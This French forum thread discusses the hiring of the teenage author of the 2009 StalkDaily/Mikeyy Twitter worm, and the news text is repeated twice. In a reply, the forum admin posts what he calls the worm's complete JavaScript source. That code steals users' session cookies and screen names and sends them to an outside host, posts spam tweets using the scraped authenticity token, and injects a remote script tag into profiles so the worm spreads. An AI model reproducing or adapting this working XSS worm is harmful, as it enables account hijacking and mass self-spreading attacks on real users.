Le créateur du virus twitter embauché pour s'occuper de sécurité informatique
2 participants
Page 1 sur 1
Le créateur du virus twitter embauché pour s'occuper de sécurité informatique
Le créateur d'un virus/ver qui avait infecté le site de microblogging Twitter a été embauché par une société informatique pour s'occuper de sécurité.
Mike Mooney, en codant un virus diffusé sur le site/réseau social Twitter semble avoir trouvé un remède efficace à la crise puisque que la société ExqSoft Solutions LLC lui a proposé un emploi comme développeur et analyste de la sécurité.
La société semble avoir été impressionné par l'exploit de ce jeune new-yorkais de 17 ans qui a codé
son virus à la main semble-t-il "par ennui" et pour promouvoir son site StalkDaily.com. Cet exploit avait toutefois causé quelques désagréments chez les utilisateurs de Twitter qui s'étaient retrouvé infecté, nous donnions d'ailleurs quelques recommandations pour éviter et se débarrasser du virus la semaine dernière: Virus twitter mikeyy/stalkdaily : comment le supprimer
Ce fait n'est pas une première, il arrive régulièrement que des créateurs de virus réussissent à trouver un emploi suite à la diffusion de leurs fichiers malveillants. Il ne faudrait toutefois pas que cela devienne une habitude, même si après coup, certains se féliciteront de les voir passer du bon côté de la lutte anti-malware plutôt que de continuer à infecter nos ordinateurs pour des buts moins avouables.
Il y a quelque temps un jeune autodidacte de la sécurité, Owen Thor Walker, avait lui aussi décroché un job après avoir infecté des dizaines de milliers de machines dans le but de se créer un botnet
Mike Mooney, en codant un virus diffusé sur le site/réseau social Twitter semble avoir trouvé un remède efficace à la crise puisque que la société ExqSoft Solutions LLC lui a proposé un emploi comme développeur et analyste de la sécurité.
La société semble avoir été impressionné par l'exploit de ce jeune new-yorkais de 17 ans qui a codé
son virus à la main semble-t-il "par ennui" et pour promouvoir son site StalkDaily.com. Cet exploit avait toutefois causé quelques désagréments chez les utilisateurs de Twitter qui s'étaient retrouvé infecté, nous donnions d'ailleurs quelques recommandations pour éviter et se débarrasser du virus la semaine dernière: Virus twitter mikeyy/stalkdaily : comment le supprimer
Ce fait n'est pas une première, il arrive régulièrement que des créateurs de virus réussissent à trouver un emploi suite à la diffusion de leurs fichiers malveillants. Il ne faudrait toutefois pas que cela devienne une habitude, même si après coup, certains se féliciteront de les voir passer du bon côté de la lutte anti-malware plutôt que de continuer à infecter nos ordinateurs pour des buts moins avouables.
Il y a quelque temps un jeune autodidacte de la sécurité, Owen Thor Walker, avait lui aussi décroché un job après avoir infecté des dizaines de milliers de machines dans le but de se créer un botnet
Napoléon- Admin
-
Nombre de messages : 2934
Localisation : Tunisie
Réputation : 122
Points : 7674
Date d'inscription : 19/03/2007
Feuille de personnage
Capacité linguistique:
(999/1000)
Re: Le créateur du virus twitter embauché pour s'occuper de sécurité informatique
Voici "le code source de l'attaque XSS" :
- Code:
function XHConn()
{
var xmlhttp, bComplete = false;
try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) { try { xmlhttp = new XMLHttpRequest(); }
catch (e) { xmlhttp = false; }}}
if (!xmlhttp) return null;
this.connect = function(sURL, sMethod, sVars, fnDone)
{
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET")
{
xmlhttp.open(sMethod, sURL+"?"+sVars, true);
sVars = "";
}
else
{
xmlhttp.open(sMethod, sURL, true);
xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
}
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && !bComplete)
{
bComplete = true;
fnDone(xmlhttp);
}};
xmlhttp.send(sVars);
}
catch(z) { return false; }
return true;
};
return this;
}
function urlencode( str ) {
var histogram = {}, tmp_arr = [];
var ret = str.toString();
var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};
histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
histogram['%20'] = '+';
ret = encodeURIComponent(ret);
for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}
return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
return "%"+m2.toUpperCase();
});
return ret;
}
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
var cookie;
cookie = urlencode(document·cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
function wait()
{
var content = document.documentElement.innerHTML;
authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);
var randomUpdate=new Array();
randomUpdate[0]="Dude, [Vous devez être inscrit et connecté pour voir ce lien] is awesome. What's the fuss?";
randomUpdate[1]="Join [Vous devez être inscrit et connecté pour voir ce lien] everyone!";
randomUpdate[2]="Woooo, [Vous devez être inscrit et connecté pour voir ce lien] :)";
randomUpdate[3]="Virus!? What? [Vous devez être inscrit et connecté pour voir ce lien] is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter [Vous devez être inscrit et connecté pour voir ce lien]
var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
updateEncode = urlencode(genRand);
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);
Napoléon- Admin
-
Nombre de messages : 2934
Localisation : Tunisie
Réputation : 122
Points : 7674
Date d'inscription : 19/03/2007
Feuille de personnage
Capacité linguistique:
(999/1000)
Re: Le créateur du virus twitter embauché pour s'occuper de sécurité informatique
C'est très répondu cet acte, embaucher un fraudeur de sécurité au sein de la même société attaquée, car c'est le mieux placé pour connaitre les failles !!!
lamia- Modérateur
-
Nombre de messages : 1936
Age : 37
Localisation : Tunis
Réputation : 53
Points : 6603
Date d'inscription : 04/11/2007
Feuille de personnage
Capacité linguistique:
(996/1000)
Sujets similaires
» Sécurité: Définition de CEM: Compromission ElectroMagnétique
» Des chercheurs français découvrent un virus infectant un autre virus
» Comment se passe un entretien/examen oral ?
» Sécurité
» Ingénieur sécurité : 3000 €
» Des chercheurs français découvrent un virus infectant un autre virus
» Comment se passe un entretien/examen oral ?
» Sécurité
» Ingénieur sécurité : 3000 €
Page 1 sur 1
Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum